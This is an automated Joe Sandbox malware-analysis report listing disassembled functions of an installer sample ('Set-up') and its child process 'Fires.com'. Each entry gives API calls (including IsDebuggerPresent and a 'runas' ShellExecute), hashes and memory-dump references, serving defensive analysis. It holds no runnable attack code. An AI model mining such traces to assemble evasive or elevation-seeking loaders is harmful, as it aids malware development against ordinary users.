Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

..., xrefs: 00406293
%02x%c, xrefs: 00406270

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Section: "%s", xrefs: 00405079
Skipping section: "%s", xrefs: 004050B5

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: Fires.comPID: 6432, Parent PID: 6484COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	54

Executed Functions

Function 00D45FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00D45FF7

Part of subcall function 00D48577: _wcslen.LIBCMT ref: 00D4858A

GetCurrentProcess.KERNEL32(?,00DDDC2C,00000000,?,?), ref: 00D46123
IsWow64Process.KERNEL32(00000000,?,?), ref: 00D4612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D46155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D46167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00D46175
FreeLibrary.KERNEL32(00000000,?,?), ref: 00D4617C
GetSystemInfo.KERNEL32(?,?,?), ref: 00D461A1

Strings

kernel32.dll, xrefs: 00D46150
|O, xrefs: 00D850F7
GetNativeSystemInfo, xrefs: 00D46161

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 579197fa0b55fcf5e6d2d1d7c5613f887a79ceb0e738ea829673f34b2c237920
Instruction ID: 3240f38ecf45f17069c0c8bedf4f8e214fae00f1a9bdfa68371cdb5d2331f998
Opcode Fuzzy Hash: 579197fa0b55fcf5e6d2d1d7c5613f887a79ceb0e738ea829673f34b2c237920
Instruction Fuzzy Hash: 15A1933180A3C6CFCB11DF6ABC451D57F956B27300B48C8AED6A1B7226D629856CCB36

Function 00D4338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D43368,?), ref: 00D433BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D43368,?), ref: 00D433CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00E12418,00E12400,?,?,?,?,?,?,00D43368,?), ref: 00D4343A

Part of subcall function 00D48577: _wcslen.LIBCMT ref: 00D4858A

Part of subcall function 00D4425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D43462,00E12418,?,?,?,?,?,?,?,00D43368,?), ref: 00D442A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00E12418,?,?,?,?,?,?,?,00D43368,?), ref: 00D434BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00D83CB0
SetCurrentDirectoryW.KERNEL32(?,00E12418,?,?,?,?,?,?,?,00D43368,?), ref: 00D83CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E031F4,00E12418,?,?,?,?,?,?,?,00D43368), ref: 00D83D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00D83D81

Part of subcall function 00D434D3: GetSysColorBrush.USER32(0000000F), ref: 00D434DE
